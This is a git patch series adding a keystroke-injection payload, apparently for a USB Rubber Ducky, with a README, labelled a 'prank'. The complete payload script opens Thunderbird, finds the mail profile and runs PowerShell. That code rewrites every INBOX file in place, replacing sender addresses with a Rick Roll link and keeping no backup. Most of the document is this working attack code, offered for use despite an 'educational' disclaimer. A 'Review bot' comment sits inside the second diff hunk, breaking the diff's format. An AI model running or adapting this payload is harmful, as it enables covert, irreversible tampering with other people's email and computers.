From 30c6dd4aa6462776e9c8be0b4d50b69c5cdb0614 Mon Sep 17 00:00:00 2001
From: Aleff
Date: Mon, 3 Jun 2024 09:04:17 +0200
Subject: [PATCH 1/2] Prank In The Middle - Thunderbird

The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank. I don't know if anyone else has uploaded the same thing in the past, so apologies if it already exists.
---
.../Prank_In_The_Middle_Thunderbird/README.md | 168 ++++++++++++++++++
.../payload.txt | 83 +++++++++
2 files changed, 251 insertions(+)
create mode 100644 payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md
create mode 100644 payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md
new file mode 100644
index 00000000..71302b67
--- /dev/null
+++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md
@@ -0,0 +1,168 @@ +# Prank In The Middle - Thunderbird + +The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank. + +**Category**: Prank + +**Plug-And-Play** ^^ + +## Index + +- [Description](#description) +- [Requirements](#requirements) +- [How the Program Works](#how-the-program-works) +- [Code Details](#code-details) + - [System Detection && Short Start DELAY](#system-detection--short-start-delay) + - [Navigating in Thunderbird](#navigating-in-thunderbird) + - [Opening PowerShell and Email Manipulation](#opening-powershell-and-email-manipulation) + - [The Regex](#the-regex) +- [Notes](#notes) +- [Credits](#credits) + +## Description + +This program automates a series of actions on a Windows system (*tested on Windows 10 but should works in Windows 11*) to manipulate the contents of emails found in a Thunderbird profile. Specifically, it identifies emails in the `INBOX` file of each configured email account and replaces the sender's email addresses with a fictitious address `Rick.Roll@tinyurl.com/prinkrollme` where `prinkrollme` is the union of the words `Prank`, `Rick Roll` and `Me` (*this one was necessary becouse prinkwoll era già stato preso* **:c** *so sad...* ) all compressed into the link `tinyurl.com/prinkrollme` ([*3° note*](#notes)) that redirect to the YouTube video `https://www.youtube.com/watch?v=xMHJGd3wwZk`. + +![](https://i.ibb.co/VJjfbkJ/1.png) + +## Requirements + +- A Windows system with Thunderbird installed. +- Access to PowerShell. +- Permissions to run code in Powershell + + +## Test Environment + +- Thunderbird 115.11.1 (64 bit) +- Windows 10 Pro + +## How the Program Works + +1. **System Detection:** The program detects if the system reflects the CAPSLOCK state and sets a dynamic delay based on this. 
+2. **Opening Thunderbird:** Uses a series of commands to open Thunderbird and navigate to the profile folder settings. +3. **Copying the Profile Folder Path:** Copies the profile folder path to the clipboard. +4. **Opening PowerShell:** Opens a PowerShell window and navigates to the `ImapMail` folder of the Thunderbird profile. +5. **Email Manipulation:** Uses PowerShell to: + - Find all `INBOX` folders within `ImapMail`. + - Read the contents of the emails in `INBOX`. + - Replace the sender addresses with `Rick Roll `. + - Save the modified content back to the original email files. + +## Code Details + +### System Detection && Short Start DELAY + +```plaintext +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + ... + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION +``` + +### Navigating in Thunderbird + +```plaintext +WIN r +STRING thunderbird +ENTER +DELAY 1000 +REPEAT 4 TAB +ENTER +DELAY 500 +REPEAT 2 UPARROW +ENTER +DELAY 500 +REPEAT 3 UPARROW +ENTER +DELAY 500 +REPEAT 11 TAB +ENTER +DELAY 500 +REPEAT 4 TAB +SPACEBAR +ENTER +CTRL c +ALT F4 +``` + +### Opening PowerShell and Email Manipulation + +```plaintext +WIN r +STRING powershell +ENTER +DELAY 1500 +STRING cd +CTRL v +ENTER + +STRINGLN + cd ImapMail + $directories = Get-ChildItem -Directory | Select-Object FullName + foreach ($dir in $directories) { + $newPath = $dir.FullName -replace '\\', '/' + $newPath += "/INBOX" + if (Test-Path $newPath) { + $emails = Get-Content -Path $newPath -Raw + $modifiedEmails = $emails -replace 
"From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll " + Set-Content -Path $newPath -Value $modifiedEmails -Force + } + } +END_STRINGLN +DELAY 1000 +ALT F4 +``` + +### The Regex + +The regex was not created from scratch but was taken from the discussion “[How can I validate an email address using a regular expression?](https://stackoverflow.com/questions/201323/how-can-i-validate-an-email-address-using-a-regular-expression)” posted on **StackOverflow**. + +```plaintext +(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\]) +``` + +The only difference is the addition of `**From: <...>**` which reduces to just the email addresses that sent the emails and not all addresses detected in the file that might depict other references + +```plaintext +From:\s.*\s<...> +``` + +## Notes + +1) This program was created for educational and demonstrative purposes. Unauthorized alteration of emails is illegal, and violating others' privacy is a crime. +2) Ensure you have the necessary permissions before running any script that modifies personal or sensitive data. 
+3) Considering [Staged Payloads](https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads), generally, it is not possible to include code that downloads from external sources. In this case, however, the setup involves a redirect to a YouTube video, which has been conveniently shortened using `tiny.url`. It is important to note that this redirect can be modified, and I strongly recommend changing it to a personal link for your security. While I assure you that I will never alter the link, no one can guarantee that I won't be compromised, allowing someone else to alter the redirect. It is always advisable and a good practice to never use links found online without understanding the actual redirect and replacing it with your own link. + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
\ No newline at end of file
diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
new file mode 100644
index 00000000..8491a831
--- /dev/null
+++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
@@ -0,0 +1,83 @@
+REM #####################################################
+REM # #
+REM # Title : Prank In The Middle - Thunderbird #
+REM # Author : Aleff #
+REM # Version : 1.0 #
+REM # Category : Prank #
+REM # Target : Windows 10/11 #
+REM # #
+REM #####################################################
+
+REM Open Thunderbird and goto settings
+DELAY 2500
+WIN r
+STRING thunderbird
+ENTER
+DELAY 1000
+REPEAT 4 TAB
+ENTER
+DELAY 500
+REPEAT 2 UPARROW
+ENTER
+DELAY 500
+REPEAT 3 UPARROW
+ENTER
+DELAY 500
+
+REM Goto profile directory
+REPEAT 11 TAB
+ENTER
+DELAY 500
+
+REM Copy the directory path
+REPEAT 4 TAB
+DELAY 500
+SPACEBAR
+DELAY 500
+ENTER
+DELAY 500
+CTRL c
+DELAY 500
+ALT F4
+DELAY 500
+
+REM Open the powershell and goto the directory
+WIN r
+STRING powershell
+ENTER
+DELAY 1500
+STRING cd
+DELAY 500
+CTRL v
+DELAY 500
+ENTER
+DELAY 500
+
+REM Get the INBOX content and edit it overwriting. Then close the powershell
+STRINGLN_BLOCK
+ cd ImapMail
+ $directories = Get-ChildItem -Directory | Select-Object FullName
+ foreach ($dir in $directories) {
+ # Replace backslashes with slash
+ $newPath = $dir.FullName -replace '\\', '/'
+
+ # Add the sub-string “/INBOX” to the end
+ $newPath += "/INBOX"
+
+ # Check whether the INBOX file exists
+ if (Test-Path $newPath) {
+ # Check whether the INBOX file exists
+ $emails = Get-Content -Path $newPath -Raw
+
+ # Replace email sender with Rick Roll!
+ # The following operation is simplified and assumes that the sender starts with “From: ...”
+ # and does not contain complex MIME structures
+ $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll "
+
+ # Write the modified content into the INBOX file.
+ Set-Content -Path $newPath -Value $modifiedEmails -Force
+ }
+ }
+END_STRINGLN
+DELAY 1000
+ALT F4
\ No newline at end of file
From 06941a5e8cba2ca745fb6779ca3d96e957ec050d Mon Sep 17 00:00:00 2001
From: Aleff
Date: Tue, 4 Jun 2024 07:41:20 +0200
Subject: [PATCH 2/2] Update payload.txt
---
.../prank/Prank_In_The_Middle_Thunderbird/payload.txt | 10 +++++-----
1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
index 8491a831..6fc3cb04 100644
--- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
+++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
@@ -10,7 +10,7 @@ REM #####################################################
 
 REM Open Thunderbird and goto settings
 DELAY 2500
-WIN r
+GUI r
 STRING thunderbird
 ENTER
 DELAY 1000
@@ -32,7 +32,7 @@ DELAY 500
 REM Copy the directory path
 REPEAT 4 TAB
 DELAY 500
-SPACEBAR
+SPACE
 DELAY 500
 ENTER
 DELAY 500
@@ -42,7 +42,7 @@ ALT F4
 DELAY 500
 
 REM Open the powershell and goto the directory
-WIN r
+GUI r
 STRING powershell
 ENTER
 DELAY 1500
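Review bot: The PowerShell block in the new `payload.txt` overwrites each account's `INBOX` file in place with `Set-Content ... -Force` and keeps no copy of the original, so on the machine it runs on the edit cannot be undone by the payload; because the file also goes through a text decode/encode round trip (`Get-Content -Raw` then `Set-Content`), non-ASCII message bodies may be re-encoded and Thunderbird's index for the folder will presumably no longer match the file. For something filed under `prank` I would keep the original beside it first, `Copy-Item -Path $newPath -Destination "$newPath.bak"`, placed just before the `Set-Content` line, and state in the README that restoring that copy (or Thunderbird's folder repair) undoes the change. The second `# Check whether the INBOX file exists` comment, the one directly above `Get-Content`, is a copy-paste leftover and should read `# Read the whole INBOX file as a single string`.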
@@ -61,7 +61,7 @@ STRINGLN_BLOCK
 # Replace backslashes with slash
 $newPath = $dir.FullName -replace '\\', '/'
 
- # Add the sub-string “/INBOX” to the end
+ # Add the sub-string '/INBOX' to the end
 $newPath += "/INBOX"
 
 # Check whether the INBOX file exists
@@ -70,7 +70,7 @@ STRINGLN_BLOCK
 $emails = Get-Content -Path $newPath -Raw
 
 # Replace email sender with Rick Roll!
- # The following operation is simplified and assumes that the sender starts with “From: ...”
+ # The following operation is simplified and assumes that the sender starts with 'From: ...'
 # and does not contain complex MIME structures
 $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll "